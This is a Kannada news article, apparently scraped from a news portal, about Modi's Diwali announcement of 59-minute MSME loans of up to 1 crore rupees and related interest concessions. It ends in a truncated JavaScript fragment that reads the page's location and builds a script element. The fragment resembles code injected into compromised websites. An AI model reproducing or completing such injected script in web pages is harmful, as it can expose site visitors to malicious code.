ಬೆಂಗಳೂರು : ಸೂಕ್ಷ್ಮ, ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಉದ್ಯಮ (ಎಂಎಸ್‌ಎಂಇ)ಗಳಿಗೆ ಪ್ರಧಾನಿ ನರೇಂದ್ರ ಮೋದಿ ದೀಪಾವಳಿ ಕೊಡುಗೆ ನೀಡಿದ್ದಾರೆ. ದೇಶದ ಎಂಎಸ್‌ಎಂಇಗಳಿಗೆ ಬಂಡವಾಳ ಕ್ರೋಡೀಕರಣ ಸಮಸ್ಯೆ ಎದುರಾಗುತ್ತಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಕೇವಲ 59 ನಿಮಿಷಗಳಲ್ಲಿ 1 ಕೋಟಿ ರೂ.ವರೆಗೆ ಸಾಲ ನೀಡುವ ಯೋಜನೆಯನ್ನು ಘೋಷಿಸಿದ್ದಾರೆ.

ಈ ಬಗ್ಗೆ ವೆಬ್‌ಸೈಟ್‌ ಉದ್ಘಾಟನೆ ಮಾಡಿರುವ ಪ್ರಧಾನಿ ಮೋದಿ, ಉದ್ಯಮಿ ತನ್ನ ಕಚೇರಿಗೆ ತಲುಪುವಷ್ಟರಲ್ಲಿ ಸಾಲ ಮಂಜೂರಾಗಿರುತ್ತದೆ ಎಂದಿದ್ದಾರೆ. ಈಗಾಗಲೇ ಪ್ರಾಯೋಗಿಕವಾಗಿ ಯೋಜನೆ ಜಾರಿಗೊಳಿಸಲಾಗಿದ್ದು, 72 ಸಾವಿರ ಉದ್ಯಮಗಳಿಗೆ ಸಾಲ ನೀಡಲಾಗಿದೆ.

ಇತರ ಹಲವು ಅನುಕೂಲಗಳನ್ನೂ ಪ್ರಧಾನಿ ಘೋಷಣೆ ಮಾಡಿದ್ದಾರೆ. ಜಿಎಸ್‌ಟಿಯಲ್ಲಿ ನೋಂದಾಯಿಸಿದ ಸಂಸ್ಥೆಗಳಿಗೆ ಸುಲಭದಲ್ಲಿ ಸಾಲ ಸಿಗುತ್ತದೆ. ಜಿಎಸ್‌ಟಿ ರಿಟರ್ನ್ಸ್ ಫೈಲ್‌ ಮಾಡಿದಾಗಲೇ ಸಾಲ ಬೇಕೇ ಎಂದು ಕೇಳಲಾಗುತ್ತದೆ. ಜಿಎಸ್‌ಟಿ ನೋಂದಾಯಿತರಿಗೆ ಬಡ್ಡಿಯಲ್ಲಿ ಶೇ. 2 ರಿಯಾಯಿತಿ ನೀಡಲಾಗು ತ್ತದೆ ಎಂದು ಮೋದಿ ಹೇಳಿದ್ದಾರೆ. ರಫ್ತುದಾರರಿಗೆ ಶಿಪ್‌ಮೆಂಟ್‌ಗೂ ಮೊದಲು ಮತ್ತು ಅನಂತರ ನೀಡಲಾಗುವ ಬಡ್ಡಿ ರಿಯಾಯಿತಿಯನ್ನು ಶೇ. 3ರಿಂದ 5ಕ್ಕೆ ಏರಿಸಲಾಗಿದೆ. ಇದರ ಜತೆಗೆ ಎಂಎಸ್‌ಎಂಇಗಳಿಗೆ ಹೆಚ್ಚಿನ ಹಣಕಾಸು ಒದಗಿಸುವ ಟಿಆರ್‌ಇಡಿಎಸ್ ವ್ಯವಸ್ಥೆ ಯಲ್ಲಿ 500 ಕೋಟಿ ರೂ.ಗಿಂತ ಹೆಚ್ಚು ವಹಿವಾಟು ಹೊಂದಿರುವ ಕಂಪೆನಿಗಳು ಭಾಗಿಯಾಗುವುದು ಕಡ್ಡಾಯವಾಗಿದೆ.

Please follow and like us:
0
http://bp9news.com/wp-content/uploads/2018/10/narendra-modi-1.jpeghttp://bp9news.com/wp-content/uploads/2018/10/narendra-modi-1-150x150.jpegPolitical Bureauಪ್ರಮುಖರಾಜಕೀಯರಾಷ್ಟ್ರೀಯ1 crore loan; Modi Diwali bonus for entrepreneursಬೆಂಗಳೂರು : ಸೂಕ್ಷ್ಮ, ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಉದ್ಯಮ (ಎಂಎಸ್‌ಎಂಇ)ಗಳಿಗೆ ಪ್ರಧಾನಿ ನರೇಂದ್ರ ಮೋದಿ ದೀಪಾವಳಿ ಕೊಡುಗೆ ನೀಡಿದ್ದಾರೆ. ದೇಶದ ಎಂಎಸ್‌ಎಂಇಗಳಿಗೆ ಬಂಡವಾಳ ಕ್ರೋಡೀಕರಣ ಸಮಸ್ಯೆ ಎದುರಾಗುತ್ತಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಕೇವಲ 59 ನಿಮಿಷಗಳಲ್ಲಿ 1 ಕೋಟಿ ರೂ.ವರೆಗೆ ಸಾಲ ನೀಡುವ ಯೋಜನೆಯನ್ನು ಘೋಷಿಸಿದ್ದಾರೆ. var domain = (window.location != window.parent.location)? document.referrer : document.location.href; if(domain==''){domain = (window.location != window.parent.location) ? window.parent.location: document.location.href;} var scpt=document.createElement('script'); var GetAttribute =...Kannada News Portal